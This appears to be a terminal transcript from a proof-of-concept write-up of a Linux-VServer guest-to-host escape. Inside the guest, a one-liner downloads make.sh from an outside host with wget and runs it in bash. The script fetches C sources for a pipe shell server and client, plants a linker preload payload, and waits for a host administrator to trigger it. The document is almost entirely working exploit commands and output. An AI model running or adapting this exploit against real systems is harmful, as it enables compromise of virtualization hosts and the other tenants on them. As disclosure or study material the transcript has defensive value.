Inside the Vserver:

inside:~# echo "" > /etc/ld.so.preload; wget -q http://www.ush.it/team/ascii/hack-vserver/make.sh -O make.sh; bash make.sh
Autodetected IP is: 1.2.3.4
Build Payload ..
bash $(grep 1.2.3.4 `vserver-info 2>/dev/null|grep 'cfg-Directory:'|sed -r 's/^[^\\/]+\\//\\//g'`/*/interfaces/*/ip|cut -d'/' -f1,2,3,4)/vdir/etc/.linker\n
Build Linker ..
Build BerkeleyMail ..
2009-11-30 21:25:23 URL:http://www.ush.it/team/ascii/hack-vserver/BerkeleyMail.c [2374/2374] -> "BerkeleyMail.c" [1]
Build Pipe Shell Server ..
2009-11-30 21:25:24 URL:http://www.ush.it/team/ascii/hack-vserver/pipes.c [1689/1689] -> "pipes.c" [1]
Build Pipe Shell Client ..
2009-11-30 21:25:24 URL:http://www.ush.it/team/ascii/hack-vserver/pipec.c [2285/2285] -> "pipec.c" [1]
Deploy Pipe Shell Server ..
Deploy Pipe Shell Client ..
Deploy Linker ..
Deploy BerkeleyMail ..
Running Pipe Shell Client ..
Notes:
  1) Wait until an admin trigger the exploit
  2) If the local Vserver becomes unstable do
     echo "" > /etc/ld.so.preload

bash: no job control in this shell
outside ~ # ^C

Outside the Vserver, while the attacker is waiting for a shell:

outside ~ # vserver www.aghers.org exec cat /etc/hostname